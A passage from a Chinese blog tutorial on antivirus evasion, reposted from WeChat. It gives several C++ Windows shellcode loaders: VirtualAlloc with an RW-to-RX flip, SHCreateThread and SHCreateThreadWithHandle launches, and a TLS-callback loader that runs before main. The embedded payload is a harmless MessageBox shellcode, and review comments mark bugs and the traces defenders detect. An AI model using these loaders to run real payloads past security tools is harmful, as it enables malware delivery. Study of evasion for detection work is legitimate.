RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD old_protect = 0;
// Switch the region from RW to RX (write access is dropped, unlike the
// RtlCreateUserThread listing above). The RW->RX flip on a private
// allocation followed by a thread start inside it is what memory-scanning
// defences key on.
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READ, &old_protect);
if (bRet != 0)
{
// CTF_COINIT initialises COM on the new thread; CTF_PROCESS_REF keeps the
// process alive while the thread runs. The BOOL result is ignored and no
// thread handle is returned, so nothing below can wait for or close it.
SHCreateThread(NULL, NULL, CTF_COINIT | CTF_PROCESS_REF, (LPTHREAD_START_ROUTINE)exec);
}
// deallocate the space
// NOTE(review): this runs right after the thread is started, so it races the
// payload; had it succeeded the thread could execute freed memory. In
// practice it fails (return unchecked) because MEM_RELEASE requires
// dwSize == 0, which is the only reason the demo does not crash here.
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
SHCreateThreadWithHandle.cpp
// SHCreateThreadWithHandle.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
#include <stdint.h>
#include <shlwapi.h>
#pragma comment(lib,"shlwapi")
// Payload: raw x86 machine code that the loader copies into a VirtualAlloc'd
// region and runs from there; it is never invoked as C code.
// Notes for readers (all visible in the bytes below):
//  - Despite "nullfree" in the name, the array contains 0x00 bytes (e.g. the
//    zero-padded call displacements and the trailing 0x00).
//  - The DLL and API names it needs are embedded as plain ASCII/UTF-16 runs
//    ("user32.dll", "MessageBoxA", "GetProcAddress", "LoadLibraryA",
//    "kernel32.dll"), along with the strings "HelloWorld" and "Test", so the
//    blob is readily recognisable to string-based scanning and to an analyst.
//  - The same array appears verbatim in each listing on this page.
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
// Demo entry point: same as the SHCreateThread listing, but uses the
// SHCreateThreadWithHandle variant so the caller gets a thread handle to wait on.
int main()
{
// Reserve and commit a private RW region for the payload; the result is not
// checked, so a NULL from VirtualAlloc is written through by RtlMoveMemory.
PVOID exec = VirtualAlloc(0, sizeof(x86_nullfree_msgbox), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD old_protect = 0;
// Declared without an initialiser: only assigned if SHCreateThreadWithHandle
// succeeds, and its BOOL result is never checked.
HANDLE h_thread;
// Switch the region from RW to RX. As in the other listings, this
// protection flip on a private allocation followed by a thread start inside
// it is the behaviour memory-scanning defences look for.
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READ, &old_protect);
if (bRet != 0)
{
// CTF_COINIT initialises COM on the new thread; CTF_PROCESS_REF keeps the
// process alive while it runs. On failure h_thread is left indeterminate
// and the wait below operates on garbage.
SHCreateThreadWithHandle(NULL, NULL, CTF_COINIT | CTF_PROCESS_REF, (LPTHREAD_START_ROUTINE)exec, &h_thread);
// -1 converts to INFINITE; blocks until the payload thread exits.
// h_thread is never closed.
WaitForSingleObject(h_thread, -1);
}
// deallocate the space
// NOTE(review): MEM_RELEASE requires dwSize == 0; with sizeof(...) the call
// fails (return unchecked) and the executable region is never released.
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
tls-callback.cpp
// tls-callback.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <windows.h>
#include <iostream>
#include <string.h>
#include <stdint.h>
// Payload: raw x86 machine code that the TLS callback below copies into a
// VirtualAlloc'd region and runs from there; it is never invoked as C code.
// Notes for readers (all visible in the bytes below):
//  - Despite "nullfree" in the name, the array contains 0x00 bytes (e.g. the
//    zero-padded call displacements and the trailing 0x00).
//  - The DLL and API names it needs are embedded as plain ASCII/UTF-16 runs
//    ("user32.dll", "MessageBoxA", "GetProcAddress", "LoadLibraryA",
//    "kernel32.dll"), along with the strings "HelloWorld" and "Test", so the
//    blob is readily recognisable to string-based scanning and to an analyst.
//  - The same array appears verbatim in each listing on this page.
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
// Forward declaration of the TLS callback that the image loader invokes via
// the PE's TLS directory, before the CRT ever reaches main().
VOID callback(PVOID handle, DWORD reason, PVOID reserved);
// Register `callback` as a TLS callback. The MSVC CRT's IMAGE_TLS_DIRECTORY
// (_tls_used) points at a callback array laid out across the .CRT$XL*
// sections, so placing a pointer in .CRT$XLB inserts it into that array.
// The /INCLUDE directives force the linker to keep both symbols although
// nothing references them. The symbol names differ per architecture because
// x86 C symbols carry a leading underscore.
// Defender note: this registration is static data in the PE (TLS directory
// and .CRT$XLB contents), so it is visible by inspecting the file's TLS
// callbacks with PE tooling, without executing it.
#ifdef _WIN64
#pragma comment(linker,"/INCLUDE:_tls_used")
#pragma comment(linker,"/INCLUDE:ptr_callback")
// x64: the pointer lives in a read-only (const) segment.
#pragma const_seg(push)
#pragma const_seg(".CRT$XLB")
EXTERN_C const PIMAGE_TLS_CALLBACK ptr_callback = callback;
#pragma const_seg(pop)
#else
#pragma comment(linker,"/INCLUDE:__tls_used")
#pragma comment(linker,"/INCLUDE:_ptr_callback")
// x86: the pointer lives in a writable data segment.
#pragma data_seg(push)
#pragma data_seg(".CRT$XLB")
EXTERN_C PIMAGE_TLS_CALLBACK ptr_callback = (PIMAGE_TLS_CALLBACK)callback;
#pragma data_seg(pop)
#endif
// Entry point as seen by the CRT. By the time it runs, callback() has already
// executed during process initialisation via the TLS directory, so this body
// only prints; the payload work happened before main was reached.
int main()
{
// NOTE(review): the literal reads "Hello World!n" on the page; the backslash
// of an intended "\n" appears to have been lost in rendering. Left as-is.
std::cout << "Hello World!n";
}
// TLS callback. The loader calls it with DLL_PROCESS_ATTACH once at process
// start (before main) and again for thread attach/detach events; the guard
// below restricts the payload to the process-attach call.
VOID callback(PVOID handle, DWORD reason, PVOID reserved)
{
void* runtime;
DWORD old_protect = 0;
if (reason == DLL_PROCESS_ATTACH)
{
// Private RW allocation -> copy payload -> flip to RX. Neither VirtualAlloc
// nor VirtualProtect is checked; a NULL from VirtualAlloc would be written
// through by RtlMoveMemory. The RW->RX transition on a private region
// followed by execution from it is what memory-scanning defences key on.
runtime = VirtualAlloc(0, sizeof(x86_nullfree_msgbox), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(runtime, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
VirtualProtect(runtime, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READ, &old_protect);
// Run the payload synchronously on the initialising thread; main() does
// not start until this call returns.
int (*func)() = (int (*)())runtime;
func();
// NOTE(review): MEM_RELEASE requires dwSize == 0, so this call fails (return
// unchecked) and the executable region stays mapped for the process lifetime.
VirtualFree(runtime, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
}
原文始发于微信公众号(loochSec):免杀学习-基础-一
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。